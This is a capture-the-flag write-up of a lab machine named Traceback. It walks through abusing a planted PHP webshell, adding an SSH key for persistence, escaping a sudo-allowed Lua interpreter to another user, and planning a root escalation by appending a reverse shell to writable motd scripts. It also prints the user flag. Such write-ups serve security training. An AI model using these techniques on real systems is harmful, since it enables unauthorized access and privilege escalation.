TL;DR: finding & abusing a PHP webshell to get system access, then EoP to
another user with lua (sudo) and finally EoP to root with a motd partial script.
# Nmap 7.80 scan initiated Sun Mar 15 16:33:24 2020 as: nmap -sSCV -p 80,22 -oA nmap_services 10.10.10.181 Nmap scan report for 10.10.10.181 Host is up (0.025s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA) | 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA) |_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519) 80/tcp open http? Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Mar 15 16:35:12 2020 -- 1 IP address (1 host up) scanned in 108.17 seconds
<h1>This site has been owned</h1> <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2> <h3> - Xh4H - </h3> <!--Some of the best web shells that you might need ;)-->
The challenge's author is Xh4H. We can find it's github profile
and find a project named Web-Shells
storing some common and more exotic PHP web shells.
webadmin@traceback:/var/www/html $ ls -lhRA /home /home: total 8.0K drwxr-x--- 5 sysadmin sysadmin 4.0K Mar 15 09:07 sysadmin drwxr-x--- 5 webadmin sysadmin 4.0K Mar 15 09:08 webadmin ls: cannot open directory '/home/sysadmin': Permission denied
/home/webadmin: total 4.3M -rw------- 1 webadmin webadmin 90 Feb 27 05:53 .bash_history -rw-r--r-- 1 webadmin webadmin 220 Aug 23 2019 .bash_logout -rw-r--r-- 1 webadmin webadmin 3.7K Aug 23 2019 .bashrc drwx------ 2 webadmin webadmin 4.0K Aug 23 2019 .cache drwxrwxr-x 3 webadmin webadmin 4.0K Aug 24 2019 .local -rw-rw-r-- 1 webadmin webadmin 1 Aug 25 2019 .luvit_history -rw-r--r-- 1 webadmin webadmin 807 Aug 23 2019 .profile drwxrwxr-x 2 webadmin webadmin 4.0K Feb 27 06:29 .ssh -rwxrw-r-- 1 webadmin webadmin 870 Mar 15 09:05 cc.lua -rwxrw-r-- 1 webadmin webadmin 332 Mar 15 09:02 ccc.lua -rw-rw-rw- 1 webadmin webadmin 672 Mar 15 08:49 heli.lua -rw-r--r-- 1 webadmin webadmin 672 Mar 15 09:04 krisis.lua -rwxrwxr-x 1 sysadmin sysadmin 4.2M Aug 24 2019 luvit -rw-rw-r-- 1 webadmin webadmin 89 Aug 24 2019 note.txt -rw-r--r-- 1 webadmin webadmin 654 Mar 15 09:02 nowy.lua -rw-rw-r-- 1 webadmin webadmin 648 Mar 15 09:06 privesc.lua -rw-rw-r-- 1 webadmin webadmin 673 Mar 15 09:03 rs.lua -rw-r--r-- 1 webadmin webadmin 332 Mar 15 09:02 shell.lua -rw-r--r-- 1 webadmin webadmin 655 Mar 15 09:08 ssh.lua -rw-rw-rw- 1 webadmin webadmin 29 Mar 15 09:06 test.lua
/home/webadmin/.cache: total 0 -rw-r--r-- 1 webadmin webadmin 0 Aug 23 2019 motd.legal-displayed
/home/webadmin/.local: total 4.0K drwx------ 3 webadmin webadmin 4.0K Aug 24 2019 share
/home/webadmin/.local/share: total 4.0K drwx------ 2 webadmin webadmin 4.0K Aug 24 2019 nano
/home/webadmin/.local/share/nano: total 0
/home/webadmin/.ssh: total 4.0K -rw------- 1 webadmin webadmin 1.7K Mar 15 09:06 authorized_keys
webadmin@traceback:/var/www/html $ cat /home/webadmin/note.txt - sysadmin - I have left this tool to practice Lua. Contact me if you have any question.
We can see a bunch of lua scripts and a hint telling us to use lua.
We can edit /home/webadmin/.ssh/authorized_keys and add pubkey to gain
persistence & access a proper TTY rather than a webshell.
$ ssh webadmin@10.10.10.181 -i ~/.ssh/id_rsa The authenticity of host '10.10.10.181 (10.10.10.181)' can't be established. ECDSA key fingerprint is SHA256:7PFVHQKwaybxzyT2EcuSpJvyQcAASWY9E/TlxoqxInU. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '10.10.10.181' (ECDSA) to the list of known hosts. ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - #################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 15 09:14:09 2020 from 10.10.15.22 webadmin@traceback:~$
We can see that we can run a command luvit as sysadmin:
1 2 3 4 5 6 7 8 9 10
webadmin@traceback:~$ sudo -l Matching Defaults entries for webadmin on traceback: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback: (sysadmin) NOPASSWD: /home/webadmin/luvit
webadmin@traceback:~$ sudo -u sysadmin /home/webadmin/luvit Welcome to the Luvit repl! >
Elevation of privilege (EoP): webadmin to sysadmin#
luvit is just a wrapper opening a lua interpreter.
Then we can log in as sysadmin over ssh & get the user flag.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
$ ssh sysadmin@10.10.10.181 -i ~/.ssh/id_rsa ################################# -------- OWNED BY XH4H --------- - I guess stuff could have been configured better ^^ - #################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Sun Mar 15 09:42:11 2020 from 10.10.14.76 $ cat user.txt c24349701ae38c33ffbf0cceb2c46020
We can see that the MOTD directory is writable by sysadmin.
1 2 3 4 5 6 7
sysadmin@traceback:~$ ls -lh /etc/update-motd.d total 24K -rwxrwxr-x 1 root sysadmin 981 Mar 15 10:46 00-header -rwxrwxr-x 1 root sysadmin 982 Mar 15 10:46 10-help-text -rwxrwxr-x 1 root sysadmin 4.2K Mar 15 10:46 50-motd-news -rwxrwxr-x 1 root sysadmin 604 Mar 15 10:46 80-esm -rwxrwxr-x 1 root sysadmin 299 Mar 15 10:46 91-release-upgrade
Owned by root but writable by sysadmin so we can add any command in it.
But it seems there are reset pretty often so we can do an infinite loop to append our
reverse shell to /etc/update-motd.d/00-header indefinitely.